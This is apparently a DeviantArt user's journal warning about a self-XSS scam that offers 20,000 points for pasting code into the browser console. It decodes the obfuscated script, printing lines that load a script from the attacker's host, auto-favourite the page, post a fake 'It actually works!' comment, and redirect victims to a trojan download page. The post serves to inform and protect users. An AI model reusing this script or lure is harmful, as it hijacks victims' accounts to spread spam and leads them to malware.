Recently there are been several picture spam accounts that indicate the user to copy and paste some code into Firefox or Chrome's web console, claiming users will win 20,000 dA points. Nothing could be further from the truth. Remember kids, there is not such thing as free lunch. So, DON'T PASTE ANYTHING YOU DON'T KNOW INTO THE CONSOLE.
I would like to give you all an explanation of why and how these scams work. I know not everyone is familiar with computer stuff so i will skip some details:
Scripts received from the internet are not actually executed, but interpreted by your web browser. This means, seeing their code is one thing, but executing it is another
. Being said that, this journal entry is completely harmless because it is just showing content, but doesn't execute anything, just as the malicious deviation page itself can't, so don't worry. You execute it manually by pasting it into the console
, and that's why i said "DON'T PASTE ANYTHING YOU DON'T KNOW INTO THE CONSOLE" up there, and the reason the attacker instructs users to do so. This is the way these commands can actually "come to life" and do harm.
If you are interested in more technical details you can google "cross-site scripting".
The attacker uses a social-engineering technique, something that may sound attractive to the target audience, to make potential victims do whatever the attacker wants them to do. In this case, he is offering 20,000 dA points.
The code, located at the description, is obfuscated, masquerading its real, malicious intent. It may look something like this:
Remember that all code shown is harmless in this state. But if you paste it onto the console it's where it breaks havok.
Let's see what this does:
This is in fact HEX code. The values correspond to an ASCII character. The code in ASCII, readable text, looks like this: (Spaces added to avoid making links)
var 0xaed7=["src","script","createElement","appendChild","body","h t t p : / / d e v i a n t a r t . h p . a f . c m / g e n e r a t o r / m i x . j s"];
It does the following:
1. The first part creates an array that contains some strings, which are in fact a link and some instructions...
2. Which put into the proper order, on the second line (considering that arrays begin at the "0th" element): 4th, 3rd, 2nd, 1st, 0th, and 5th, form this string:document body appendChild ( createElement ( script ) src = h t t p : / / d e v i a n t a r t . h p .a f .c m / g e n e r a t o r / m i x . j s
document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!";
setTimeout("document.getElementsByClassName('ll f').click()", 100);
document.getElementsByClassName("smbutton smbutton-blue smbutton-big comment-submit").click();
window.top.location.href='h t t p : / / d e v i a n t a r t . h p . a f . c m / g e n e r a t o r ';
alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed')
When executed, it does the following:
document.getElementById("gmi-ResourceViewFaveButton").click(); makes the browser click on the favorite button automatically, as to appear on other deviant's favorites and propagate more,
document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!"; is similar to the previous line. This makes the browser post a comment on your behalf saying "It actually works! Wohoooooooo! Thanks!".
setTimeout("document.getElementsByClassName('ll f').click()", 100); makes the browser push the "Comment" button after a timeout, as the post button is disabled by default unless you write a comment.
window.top.location.href='h t t p : / / d e v i a n t a r t . h p . a f . c m / g e n e r a t o r '; opens the attacker's web page at a new window.
alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed') shows a small text window indicating the victim they are being redirected to the attacker's "generator".
Finally, This page is nothing more than a attempt to lure you to install a trojan virus, claiming it's a plugin necesary to show the generator and giving the attacker complete control on their victim's computer.
Everybody knows about the phony dA login screens floating around. But beware of what you do for freebies, it might be just as bad for your account. Fortunately, dA has been fast taking down these accounts. Unfortunately they keep on appearing. So, what better to avoid attacks than by knowing they exist?